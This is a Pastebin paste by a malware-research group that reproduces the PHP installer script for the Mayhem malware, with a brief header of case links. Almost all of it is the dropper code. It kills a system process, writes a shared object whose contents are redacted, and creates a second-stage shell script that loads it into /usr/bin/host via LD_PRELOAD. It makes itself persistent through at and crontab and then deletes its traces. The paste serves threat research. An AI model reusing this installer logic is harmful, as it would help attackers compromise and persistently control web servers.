SHARE
TWEET

#Mayhem Installer | latest one

MalwareMustDie Jul 27th, 2014 319 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie | ScrapNote
  2. #Mayhem script installer.
  3. #Case:
  4. https://twitter.com/MalwareMustDie/status/492572445744721921 …
  5. https://twitter.com/MalwareMustDie/status/492556259996876800 …
  6. https://twitter.com/MalwareMustDie/status/492578929232707584 …
  7.  
  8. # codes:
  9.  
  10. <?php
  11.  
  12. header("Content-type: text/plain");
  13.  
  14. if (! function_exists('file_put_contents')) {
  15.         function file_put_contents($filename, $data) {
  16.                 $f = @fopen($filename, 'w');
  17.                 if (! $f)
  18.                         return false;
  19.                 $bytes = fwrite($f, $data);
  20.                 fclose($f);
  21.                 return $bytes;
  22.         }
  23. }
  24.  
  25. @system("killall -9 ".basename("/usr/bin/host"));
  26.  
  27. $so32="xxxxxxxxxxxxxx"
  28. $so64="xxxxxxxxxxxxxx"
  29.  
  30. $arch = 64;
  31. if (intval("9223372036854775807") == 2147483647)
  32.         $arch = 32;
  33. print "Arch is ".$arch."\n";
  34. $so = $arch == 32 ? $so32 : $so64;
  35. $f = fopen("/usr/bin/host", "rb");
  36. if ($f) {
  37.         $n = unpack("C*", fread($f, 8));
  38.         $so[7] = sprintf("%c", $n[8]);
  39.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  40.         fclose($f);
  41. }
  42. print "SO dumped ".file_put_contents("./atom-aggregator.so", $so)."\n";
  43. if (getenv("MAYHEM_DEBUG"))
  44.         exit(0);
  45. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  46. /* second stage dropper */
  47. $HBN=basename("/usr/bin/host");
  48. $SCP=getcwd();
  49. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './atom-aggregator.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./atom-aggregator.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  50. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  51. @file_put_contents("1.sh", $SCR);
  52. @chmod("1.sh", 0777);
  53. /* try at now, file will be removed, crontab cleaned on success */
  54. @system("at now -f 1.sh", $ret);
  55. if ($ret == 0) {
  56.         for ($i = 0; $i < 5; $i++) {
  57.                 if (! @file_exists("1.sh")) {
  58.                         print "AT success\n";
  59.                         exit(0);
  60.                 }
  61.                 sleep(1);
  62.         }
  63. }
  64. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  65. if ($ret == 0) {
  66.         for ($i = 0; $i < 62; $i++) {
  67.                 if (! @file_exists("1.sh")) {
  68.                         print "CRONTAB success\n";
  69.                         exit(0);
  70.                 }
  71.                 sleep(1);
  72.         }
  73. }
  74. print "Running straight\n";
  75. @system("./1.sh");
  76.  
  77. ?>
  78.  
  79. -----
  80. #MalwareMustDie | Collected by @unixfreaxjp
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top